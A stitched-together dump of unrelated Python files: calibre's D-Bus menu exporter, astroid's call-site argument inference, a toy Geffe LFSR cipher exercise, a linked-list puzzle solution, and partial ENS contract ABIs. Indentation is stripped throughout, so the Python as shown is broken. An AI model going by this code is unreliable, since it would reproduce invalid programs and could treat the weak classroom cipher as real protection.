sc = dbus.Array(signature='as')
for s in shortcuts:
if not s.isEmpty():
for x in key_sequence_to_dbus_shortcut(s):
sc.append(dbus.Array(x, signature='s'))
if sc:
ans['shortcut'] = sc[:1] # Unity fails to display the shortcuts at all if more than one is specified
if ac.isIconVisibleInMenu():
icon = ac.icon()
if previous and previous.get('x-qt-icon-cache-key') == icon.cacheKey():
for x in 'icon-data x-qt-icon-cache-key'.split():
ans[x] = previous[x]
else:
data = icon_to_dbus_menu_icon(ac.icon())
if data is not None:
ans['icon-data'] = data
ans['x-qt-icon-cache-key'] = icon.cacheKey()
return ans
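# For orientation, a hedged sketch of what the function above might produce
# for a visible, enabled, checkable (non-exclusive) action labelled '&Bold';
# the exact keys depend on the action's state:
#   {'label': '_Bold', 'toggle-type': 'checkmark', 'toggle-state': 0}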
def menu_actions(menu):
try:
return menu.actions()
except TypeError:
if isinstance(menu, QMenu):
return QMenu.actions(menu)
raise
class DBusMenu(QObject):
handle_event_signal = pyqtSignal(object, object, object, object)
def __init__(self, object_path, parent=None, bus=None):
QObject.__init__(self, parent)
        # Unity barfs if the Event DBUS method does not return immediately, so
# handle it asynchronously
self.handle_event_signal.connect(self.handle_event, type=Qt.QueuedConnection)
self.dbus_api = DBusMenuAPI(self, object_path, bus=bus)
self.set_status = self.dbus_api.set_status
self._next_id = 0
self.action_changed_timer = t = QTimer(self)
t.setInterval(0), t.setSingleShot(True), t.timeout.connect(self.actions_changed)
self.layout_changed_timer = t = QTimer(self)
t.setInterval(0), t.setSingleShot(True), t.timeout.connect(self.layouts_changed)
self.init_maps()
@property
def object_path(self):
return self.dbus_api._object_path
def init_maps(self, qmenu=None):
self.action_changes = set()
self.layout_changes = set()
self.qmenu = qmenu
self._id_to_action, self._action_to_id = {}, {}
self._action_properties = {}
@property
def next_id(self):
self._next_id += 1
return self._next_id
def id_to_action(self, action_id):
if self.qmenu is None:
return None
return self._id_to_action.get(action_id)
def action_to_id(self, action):
if self.qmenu is None:
return None
return self._action_to_id.get(action)
def action_properties(self, action_id, restrict_to=None):
if self.qmenu is None:
return {}
ans = self._action_properties.get(action_id, PropDict())
if restrict_to:
ans = PropDict({k:v for k, v in ans.iteritems() if k in restrict_to})
return ans
def publish_new_menu(self, qmenu=None):
self.init_maps(qmenu)
if qmenu is not None:
qmenu.destroyed.connect(lambda obj=None:self.publish_new_menu())
ac = qmenu.menuAction()
self.add_action(ac)
self.dbus_api.LayoutUpdated(self.dbus_api.revision, 0)
def set_visible(self, visible):
ac = self.id_to_action(0)
if ac is not None and self.qmenu is not None:
changed = False
blocked = not visible
for ac in menu_actions(ac.menu()):
ac_id = self.action_to_id(ac)
if ac_id is not None:
old = ac.property('blocked')
if old is not blocked:
ac.setProperty('blocked', blocked)
self.action_changes.add(ac_id)
changed = True
if changed:
self.action_changed_timer.start()
def add_action(self, ac):
ac_id = 0 if ac.menu() is self.qmenu else self.next_id
self._id_to_action[ac_id] = ac
self._action_to_id[ac] = ac_id
self._action_properties[ac_id] = create_properties_for_action(ac)
if ac.menu() is not None:
self.add_menu(ac.menu())
def add_menu(self, menu):
menu.installEventFilter(self)
for ac in menu_actions(menu):
self.add_action(ac)
def eventFilter(self, obj, ev):
ac = getattr(obj, 'menuAction', lambda : None)()
ac_id = self.action_to_id(ac)
if ac_id is not None:
etype = ev.type()
if etype == QEvent.ActionChanged:
ac_id = self.action_to_id(ev.action())
self.action_changes.add(ac_id)
self.action_changed_timer.start()
elif etype == QEvent.ActionAdded:
self.layout_changes.add(ac_id)
self.layout_changed_timer.start()
self.add_action(ev.action())
elif etype == QEvent.ActionRemoved:
self.layout_changes.add(ac_id)
self.layout_changed_timer.start()
self.action_removed(ev.action())
return False
def actions_changed(self):
updated_props = dbus.Array(signature='(ia{sv})')
removed_props = dbus.Array(signature='(ias)')
for ac_id in self.action_changes:
ac = self.id_to_action(ac_id)
if ac is None:
continue
old_props = self.action_properties(ac_id)
new_props = self._action_properties[ac_id] = create_properties_for_action(ac, old_props)
removed = set(old_props) - set(new_props)
if removed:
removed_props.append((ac_id, dbus.Array(removed, signature='as')))
updated = PropDict({k:v for k, v in new_props.iteritems() if v != old_props.get(k, null)})
if updated:
updated_props.append((ac_id, updated))
self.action_changes = set()
if updated_props or removed_props:
self.dbus_api.ItemsPropertiesUpdated(updated_props, removed_props)
return updated_props, removed_props
def layouts_changed(self):
changes = set()
for ac_id in self.layout_changes:
if ac_id in self._id_to_action:
changes.add(ac_id)
self.layout_changes = set()
if changes:
self.dbus_api.revision += 1
for change in changes:
self.dbus_api.LayoutUpdated(self.dbus_api.revision, change)
return changes
def action_is_in_a_menu(self, ac):
all_menus = {ac.menu() for ac in self._action_to_id}
all_menus.discard(None)
return bool(set(ac.associatedWidgets()).intersection(all_menus))
def action_removed(self, ac):
if not self.action_is_in_a_menu(ac):
ac_id = self._action_to_id.pop(ac, None)
self._id_to_action.pop(ac_id, None)
self._action_properties.pop(ac_id, None)
def get_layout(self, parent_id, depth, property_names):
# Ensure any pending updates are done, as they are needed now
self.actions_changed()
self.layouts_changed()
property_names = property_names or None
props = self.action_properties(parent_id, property_names)
return parent_id, props, self.get_layout_children(parent_id, depth, property_names)
def get_layout_children(self, parent_id, depth, property_names):
ans = dbus.Array(signature='(ia{sv}av)')
ac = self.id_to_action(parent_id)
if ac is not None and depth != 0 and ac.menu() is not None:
for child in menu_actions(ac.menu()):
child_id = self.action_to_id(child)
if child_id is not None:
props = self.action_properties(child_id, property_names)
ans.append((child_id, props, self.get_layout_children(child_id, depth - 1, property_names)))
return ans
def get_properties(self, ids=None, property_names=None):
property_names = property_names or None
ans = dbus.Array(signature='(ia{sv})')
for action_id in (ids or self._id_to_action):
ans.append((action_id, self.action_properties(action_id, property_names)))
return ans
def handle_event(self, action_id, event, data, timestamp):
ac = self.id_to_action(action_id)
if event == 'clicked':
if ac.isCheckable():
ac.toggle()
ac.triggered.emit(ac.isCheckable() and ac.isChecked())
def handle_about_to_show(self, ac):
child_ids = {self.action_to_id(x) for x in menu_actions(ac.menu())}
child_ids.discard(None)
ac_id = self.action_to_id(ac)
ac.menu().aboutToShow.emit()
if ac_id in self.layout_changes or child_ids.intersection(self.action_changes):
return True
return False
class DBusMenuAPI(Object):
IFACE = 'com.canonical.dbusmenu'
def __init__(self, menu, object_path, bus=None):
if bus is None:
bus = dbus.SessionBus()
Object.__init__(self, bus, object_path)
self.status = 'normal'
self.menu = menu
self.revision = 0
@dbus_property(IFACE, signature='u')
def Version(self):
return 3 # GTK 3 uses 3, KDE 4 uses 2
@dbus_property(IFACE, signature='s', emits_changed_signal=True)
def Status(self):
return self.status
def set_status(self, normal=True):
self.status = 'normal' if normal else 'notice'
self.PropertiesChanged(self.IFACE, {'Status': self.status}, [])
@dbus_property(IFACE, signature='s')
def TextDirection(self):
return 'ltr' if QApplication.instance().isLeftToRight() else 'rtl'
@dbus_property(IFACE, signature='as')
def IconThemePath(self):
return dbus.Array(signature='s')
@dbus_method(IFACE, in_signature='iias', out_signature='u(ia{sv}av)')
def GetLayout(self, parentId, recursionDepth, propertyNames):
layout = self.menu.get_layout(parentId, recursionDepth, propertyNames)
return self.revision, layout
@dbus_method(IFACE, in_signature='aias', out_signature='a(ia{sv})')
def GetGroupProperties(self, ids, propertyNames):
return self.menu.get_properties(ids, propertyNames)
@dbus_method(IFACE, in_signature='is', out_signature='v')
def GetProperty(self, id, name):
return self.menu.action_properties(id).get(name, '')
@dbus_method(IFACE, in_signature='isvu', out_signature='')
def Event(self, id, eventId, data, timestamp):
        ''' This is called by the applet to notify the application that an event happened on a
menu item. eventId can be one of the following::
* "clicked"
* "hovered"
* "opened"
* "closed"
Vendor specific events can be added by prefixing them with "x-<vendor>-"'''
if self.menu.id_to_action(id) is not None:
self.menu.handle_event_signal.emit(id, eventId, data, timestamp)
@dbus_method(IFACE, in_signature='a(isvu)', out_signature='ai')
def EventGroup(self, events):
        ''' Used to pass a set of events as a single message for possibly
        several different menu items. This is done to optimize DBus traffic.
Should return a list of ids that are not found. events is a list of
events in the same format as used for the Event method.'''
missing = dbus.Array(signature='u')
for id, eventId, data, timestamp in events:
if self.menu.id_to_action(id) is not None:
self.menu.handle_event_signal.emit(id, eventId, data, timestamp)
else:
missing.append(id)
return missing
@dbus_method(IFACE, in_signature='i', out_signature='b')
def AboutToShow(self, id):
ac = self.menu.id_to_action(id)
if ac is not None and ac.menu() is not None:
return self.menu.handle_about_to_show(ac)
return False
@dbus_method(IFACE, in_signature='ai', out_signature='aiai')
def AboutToShowGroup(self, ids):
updates_needed = dbus.Array(signature='i')
id_errors = dbus.Array(signature='i')
for ac_id in ids:
            ac = self.menu.id_to_action(ac_id)
if ac is not None and ac.menu() is not None:
if self.menu.handle_about_to_show(ac):
updates_needed.append(ac_id)
else:
id_errors.append(ac_id)
return updates_needed, id_errors
@dbus_signal(IFACE, 'a(ia{sv})a(ias)')
def ItemsPropertiesUpdated(self, updatedProps, removedProps):
pass
@dbus_signal(IFACE, 'ui')
def LayoutUpdated(self, revision, parent):
pass
@dbus_signal(IFACE, 'iu')
def ItemActivationRequested(self, id, timestamp):
pass
def test():
setup_for_cli_run()
app = QApplication([])
bus = dbus.SessionBus()
dbus_name = BusName('com.calibre-ebook.TestDBusMenu', bus=bus, do_not_queue=True)
m = QMenu()
ac = m.addAction(QIcon(I('window-close.png')), 'Quit', app.quit)
ac.setShortcut(QKeySequence('Ctrl+Q'))
menu = DBusMenu('/Menu', bus=bus)
menu.publish_new_menu(m)
app.exec_()
del dbus_name
if __name__ == '__main__':
test()
|
# Copyright (c) 2015-2016, 2018-2020 Claudiu Popa <[email protected]>
# Copyright (c) 2015-2016 Ceridwen <[email protected]>
# Copyright (c) 2018 Bryce Guinta <[email protected]>
# Copyright (c) 2018 Nick Drozd <[email protected]>
# Copyright (c) 2018 Anthony Sottile <[email protected]>
# Copyright (c) 2020 hippo91 <[email protected]>
# Copyright (c) 2021 Pierre Sassoulas <[email protected]>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE
from astroid import bases
from astroid import context as contextmod
from astroid import exceptions, nodes, util
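# Typical entry point, as a sketch: given an astroid Call node `call` and an
# inferred function node `funcnode` ('some_arg' is an illustrative name):
#   site = CallSite.from_call(call)
#   values = site.infer_argument(funcnode, 'some_arg', context)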
class CallSite:
"""Class for understanding arguments passed into a call site
It needs a call context, which contains the arguments and the
keyword arguments that were passed into a given call site.
In order to infer what an argument represents, call :meth:`infer_argument`
with the corresponding function node and the argument name.
:param callcontext:
An instance of :class:`astroid.context.CallContext`, that holds
the arguments for the call site.
:param argument_context_map:
Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context`
:param context:
An instance of :class:`astroid.context.Context`.
"""
def __init__(self, callcontext, argument_context_map=None, context=None):
if argument_context_map is None:
argument_context_map = {}
self.argument_context_map = argument_context_map
args = callcontext.args
keywords = callcontext.keywords
self.duplicated_keywords = set()
self._unpacked_args = self._unpack_args(args, context=context)
self._unpacked_kwargs = self._unpack_keywords(keywords, context=context)
self.positional_arguments = [
arg for arg in self._unpacked_args if arg is not util.Uninferable
]
self.keyword_arguments = {
key: value
for key, value in self._unpacked_kwargs.items()
if value is not util.Uninferable
}
@classmethod
def from_call(cls, call_node, context=None):
"""Get a CallSite object from the given Call node.
:param context:
An instance of :class:`astroid.context.Context` that will be used
to force a single inference path.
"""
# Determine the callcontext from the given `context` object if any.
context = context or contextmod.InferenceContext()
callcontext = contextmod.CallContext(call_node.args, call_node.keywords)
return cls(callcontext, context=context)
def has_invalid_arguments(self):
"""Check if in the current CallSite were passed *invalid* arguments
This can mean multiple things. For instance, if an unpacking
of an invalid object was passed, then this method will return True.
Other cases can be when the arguments can't be inferred by astroid,
for example, by passing objects which aren't known statically.
"""
return len(self.positional_arguments) != len(self._unpacked_args)
def has_invalid_keywords(self):
"""Check if in the current CallSite were passed *invalid* keyword arguments
For instance, unpacking a dictionary with integer keys is invalid
(**{1:2}), because the keys must be strings, which will make this
method to return True. Other cases where this might return True if
objects which can't be inferred were passed.
"""
return len(self.keyword_arguments) != len(self._unpacked_kwargs)
def _unpack_keywords(self, keywords, context=None):
values = {}
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for name, value in keywords:
if name is None:
# Then it's an unpacking operation (**)
try:
inferred = next(value.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(inferred, nodes.Dict):
# Not something we can work with.
values[name] = util.Uninferable
continue
for dict_key, dict_value in inferred.items:
try:
dict_key = next(dict_key.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(dict_key, nodes.Const):
values[name] = util.Uninferable
continue
if not isinstance(dict_key.value, str):
values[name] = util.Uninferable
continue
if dict_key.value in values:
# The name is already in the dictionary
values[dict_key.value] = util.Uninferable
self.duplicated_keywords.add(dict_key.value)
continue
values[dict_key.value] = dict_value
else:
values[name] = value
return values
def _unpack_args(self, args, context=None):
values = []
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for arg in args:
if isinstance(arg, nodes.Starred):
try:
inferred = next(arg.value.infer(context=context))
except exceptions.InferenceError:
values.append(util.Uninferable)
continue
if inferred is util.Uninferable:
values.append(util.Uninferable)
continue
if not hasattr(inferred, "elts"):
values.append(util.Uninferable)
continue
values.extend(inferred.elts)
else:
values.append(arg)
return values
def infer_argument(self, funcnode, name, context):
"""infer a function argument value according to the call context
Arguments:
funcnode: The function being called.
name: The name of the argument whose value is being inferred.
context: Inference context object
"""
if name in self.duplicated_keywords:
raise exceptions.InferenceError(
"The arguments passed to {func!r} " " have duplicate keywords.",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
# Look into the keywords first, maybe it's already there.
try:
return self.keyword_arguments[name].infer(context)
except KeyError:
pass
# Too many arguments given and no variable arguments.
if len(self.positional_arguments) > len(funcnode.args.args):
if not funcnode.args.vararg and not funcnode.args.posonlyargs:
raise exceptions.InferenceError(
"Too many positional arguments "
"passed to {func!r} that does "
"not have *args.",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
positional = self.positional_arguments[: len(funcnode.args.args)]
vararg = self.positional_arguments[len(funcnode.args.args) :]
argindex = funcnode.args.find_argname(name)[0]
kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs}
kwargs = {
key: value
for key, value in self.keyword_arguments.items()
if key not in kwonlyargs
}
# If there are too few positionals compared to
# what the function expects to receive, check to see
# if the missing positional arguments were passed
# as keyword arguments and if so, place them into the
# positional args list.
if len(positional) < len(funcnode.args.args):
for func_arg in funcnode.args.args:
if func_arg.name in kwargs:
arg = kwargs.pop(func_arg.name)
positional.append(arg)
if argindex is not None:
            # 1. first argument of instance/class method
if argindex == 0 and funcnode.type in ("method", "classmethod"):
if context.boundnode is not None:
boundnode = context.boundnode
else:
# XXX can do better ?
boundnode = funcnode.parent.frame()
if isinstance(boundnode, nodes.ClassDef):
# Verify that we're accessing a method
# of the metaclass through a class, as in
# `cls.metaclass_method`. In this case, the
# first argument is always the class.
method_scope = funcnode.parent.scope()
if method_scope is boundnode.metaclass():
return iter((boundnode,))
if funcnode.type == "method":
if not isinstance(boundnode, bases.Instance):
boundnode = boundnode.instantiate_class()
return iter((boundnode,))
if funcnode.type == "classmethod":
return iter((boundnode,))
            # if we have a method, extract one position
            # from the index, so we'll take into account
            # the extra parameter represented by `self` or `cls`
if funcnode.type in ("method", "classmethod"):
argindex -= 1
# 2. search arg index
try:
return self.positional_arguments[argindex].infer(context)
except IndexError:
pass
if funcnode.args.kwarg == name:
# It wants all the keywords that were passed into
# the call site.
if self.has_invalid_keywords():
raise exceptions.InferenceError(
"Inference failed to find values for all keyword arguments "
"to {func!r}: {unpacked_kwargs!r} doesn't correspond to "
"{keyword_arguments!r}.",
keyword_arguments=self.keyword_arguments,
unpacked_kwargs=self._unpacked_kwargs,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
kwarg = nodes.Dict(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
kwarg.postinit(
[(nodes.const_factory(key), value) for key, value in kwargs.items()]
)
return iter((kwarg,))
if funcnode.args.vararg == name:
# It wants all the args that were passed into
# the call site.
if self.has_invalid_arguments():
raise exceptions.InferenceError(
"Inference failed to find values for all positional "
"arguments to {func!r}: {unpacked_args!r} doesn't "
"correspond to {positional_arguments!r}.",
positional_arguments=self.positional_arguments,
unpacked_args=self._unpacked_args,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
args = nodes.Tuple(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
args.postinit(vararg)
return iter((args,))
# Check if it's a default parameter.
try:
return funcnode.args.default_value(name).infer(context)
except exceptions.NoDefault:
pass
raise exceptions.InferenceError(
"No value found for argument {arg} to {func!r}",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
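# A minimal usage sketch (illustrative, not part of astroid itself): build a
# CallSite from a parsed call and inspect the unpacked arguments. The sample
# source string below is an assumption for demonstration purposes.
if __name__ == "__main__":
    import astroid
    module = astroid.parse(
        'def greet(name, punctuation="!"):\n'
        '    return name + punctuation\n'
        'greet("world")\n'
    )
    call_node = module.body[-1].value  # the Call node for greet("world")
    site = CallSite.from_call(call_node)
    print(site.positional_arguments)    # [<Const.str ...>]
    print(site.has_invalid_arguments())  # False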
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 30 09:48:53 2015
@author: Alejandro Alcalde (elbauldelprogramador.com)
"""
from ej2 import LFSR
def geffe(coef1, s1, coef2, s2, coef3, s3, l):
l1 = LFSR(coef1, s1, l)
l2 = LFSR(coef2, s2, l)
l3 = LFSR(coef3, s3, l)
r = []
for i, j, k in zip(l1,l2,l3):
        x1 = i * j
        x2 = j * k
        x3 = k
        f = (x1 ^ x2) ^ x3
r.append(f)
return r
def encrypt(m, coef1, s1, coef2, s2, coef3, s3):
"""
Takes a message and ciphers it with a key using geffe
"""
k = geffe(coef1, s1, coef2, s2, coef3, s3, len(m))
c = ""
for i,j in zip(m,k):
c += chr(ord(i) ^ j)
return c, k
def decrypt(c, k):
"""
Decrypt a message cipher with geffe
"""
m = ""
for i,j in zip(c,k):
m += chr((ord(i) ^ j))
return m
c,k = encrypt(
"Lorem itsum sit amet",
[1,1,0,0,1,0], [1,1,1,1,0,1],
[1,0,1,0,1,1], [1,0,1,1,1,1],
[1,1,0,1,0,0], [1,1,0,1,0,0])
print "Cipher %s \n\n ..... \n\n%s" % (c,k)
print "Decipher \n\n" + decrypt(c,k)
## Primos relativos para p1p2p3
s = geffe([1,0,1], [1,1,1],
[1,0,0,1], [1,1,1,1],
[1,0,0,1,0], [1,1,1,1,1], 3500)
print(''.join(map(str, s)))
|
# -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
"""
链表中倒数第k个结点
题目描述
输入一个链表,输出该链表中倒数第k个结点。
特殊情况 k=0 k 超过长度 head 为空
思路:
如果我们在遍历时维持两个指针,第一个指针从链表的头指针开始遍历,在第k-1步之前,第二个指针保持不动;
在第k-1步开始,第二个指针也开始从链表的头指针开始遍历。
由于两个指针的距离保持在k-1,当第一个(走在前面的)指针到达链表的尾结点时,第二个指针(走在后面的)指针正好是倒数第k个结点。
"""
class Solution:
def FindKthToTail(self, head, k):
# write code here
        pre, aft = head, head
        if head is None:
            return head
        if k == 0:
            return None
        for i in range(k - 1):
            if aft.next is None:
                return None
            aft = aft.next
        while aft.next is not None:
            aft = aft.next
            pre = pre.next
        return pre
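# A quick self-check sketch (assumed harness, not part of the original
# problem): build the list 1 -> 2 -> 3 -> 4 -> 5 and fetch the 2nd node
# from the tail, which should hold the value 4.
if __name__ == "__main__":
    class ListNode:
        def __init__(self, x):
            self.val = x
            self.next = None
    head = ListNode(1)
    tail = head
    for v in range(2, 6):
        tail.next = ListNode(v)
        tail = tail.next
    print(Solution().FindKthToTail(head, 2).val)  # 4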
|
ENS = [
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "resolver",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "owner",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "label",
"type": "bytes32"
},
{
"name": "owner",
"type": "address"
}
],
"name": "setSubnodeOwner",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "ttl",
"type": "uint64"
}
],
"name": "setTTL",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "node",
"type": "bytes32"
}
],
"name": "ttl",
"outputs": [
{
"name": "",
"type": "uint64"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "resolver",
"type": "address"
}
],
"name": "setResolver",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "node",
"type": "bytes32"
},
{
"name": "owner",
"type": "address"
}
],
"name": "setOwner",
"outputs": [],
"payable": False,
"type": "function"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "owner",
"type": "address"
}
],
"name": "Transfer",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": True,
"name": "label",
"type": "bytes32"
},
{
"indexed": False,
"name": "owner",
"type": "address"
}
],
"name": "NewOwner",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "resolver",
"type": "address"
}
],
"name": "NewResolver",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "node",
"type": "bytes32"
},
{
"indexed": False,
"name": "ttl",
"type": "uint64"
}
],
"name": "NewTTL",
"type": "event"
}
]
AUCTION_REGISTRAR = [
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "releaseDeed",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "getAllowedTime",
"outputs": [
{
"name": "timestamp",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "unhashedName",
"type": "string"
}
],
"name": "invalidateName",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "hash",
"type": "bytes32"
},
{
"name": "owner",
"type": "address"
},
{
"name": "value",
"type": "uint256"
},
{
"name": "salt",
"type": "bytes32"
}
],
"name": "shaBid",
"outputs": [
{
"name": "sealedBid",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "bidder",
"type": "address"
},
{
"name": "seal",
"type": "bytes32"
}
],
"name": "cancelBid",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "entries",
"outputs": [
{
"name": "",
"type": "uint8"
},
{
"name": "",
"type": "address"
},
{
"name": "",
"type": "uint256"
},
{
"name": "",
"type": "uint256"
},
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "ens",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
},
{
"name": "_value",
"type": "uint256"
},
{
"name": "_salt",
"type": "bytes32"
}
],
"name": "unsealBid",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "transferRegistrars",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "",
"type": "address"
},
{
"name": "",
"type": "bytes32"
}
],
"name": "sealedBids",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "state",
"outputs": [
{
"name": "",
"type": "uint8"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
},
{
"name": "newOwner",
"type": "address"
}
],
"name": "transfer",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
},
{
"name": "_timestamp",
"type": "uint256"
}
],
"name": "isAllowed",
"outputs": [
{
"name": "allowed",
"type": "bool"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "finalizeAuction",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "registryStarted",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "launchLength",
"outputs": [
{
"name": "",
"type": "uint32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "sealedBid",
"type": "bytes32"
}
],
"name": "newBid",
"outputs": [],
"payable": True,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "labels",
"type": "bytes32[]"
}
],
"name": "eraseNode",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hashes",
"type": "bytes32[]"
}
],
"name": "startAuctions",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "hash",
"type": "bytes32"
},
{
"name": "deed",
"type": "address"
},
{
"name": "registrationDate",
"type": "uint256"
}
],
"name": "acceptRegistrarTransfer",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_hash",
"type": "bytes32"
}
],
"name": "startAuction",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "rootNode",
"outputs": [
{
"name": "",
"type": "bytes32"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "hashes",
"type": "bytes32[]"
},
{
"name": "sealedBid",
"type": "bytes32"
}
],
"name": "startAuctionsAndBid",
"outputs": [],
"payable": True,
"type": "function"
},
{
"inputs": [
{
"name": "_ens",
"type": "address"
},
{
"name": "_rootNode",
"type": "bytes32"
},
{
"name": "_startDate",
"type": "uint256"
}
],
"payable": False,
"type": "constructor"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": False,
"name": "registrationDate",
"type": "uint256"
}
],
"name": "AuctionStarted",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": True,
"name": "bidder",
"type": "address"
},
{
"indexed": False,
"name": "deposit",
"type": "uint256"
}
],
"name": "NewBid",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": True,
"name": "owner",
"type": "address"
},
{
"indexed": False,
"name": "value",
"type": "uint256"
},
{
"indexed": False,
"name": "status",
"type": "uint8"
}
],
"name": "BidRevealed",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": True,
"name": "owner",
"type": "address"
},
{
"indexed": False,
"name": "value",
"type": "uint256"
},
{
"indexed": False,
"name": "registrationDate",
"type": "uint256"
}
],
"name": "HashRegistered",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": False,
"name": "value",
"type": "uint256"
}
],
"name": "HashReleased",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "hash",
"type": "bytes32"
},
{
"indexed": True,
"name": "name",
"type": "string"
},
{
"indexed": False,
"name": "value",
"type": "uint256"
},
{
"indexed": False,
"name": "registrationDate",
"type": "uint256"
}
],
"name": "HashInvalidated",
"type": "event"
}
]
DEED = [
{
"constant": True,
"inputs": [],
"name": "creationDate",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [],
"name": "destroyDeed",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "newOwner",
"type": "address"
}
],
"name": "setOwner",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "registrar",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "owner",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "refundRatio",
"type": "uint256"
}
],
"name": "closeDeed",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "newRegistrar",
"type": "address"
}
],
"name": "setRegistrar",
"outputs": [],
"payable": False,
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "newValue",
"type": "uint256"
}
],
"name": "setBalance",
"outputs": [],
"payable": True,
"type": "function"
},
{
"inputs": [],
"type": "constructor"
},
{
"payable": True,
"type": "fallback"
},
{
"anonymous": False,
"inputs": [
{
"indexed": False,
"name": "newOwner",
"type": "address"
}
],
"name": "OwnerChanged",
"type": "event"
},
{
"anonymous": False,
"inputs": [],
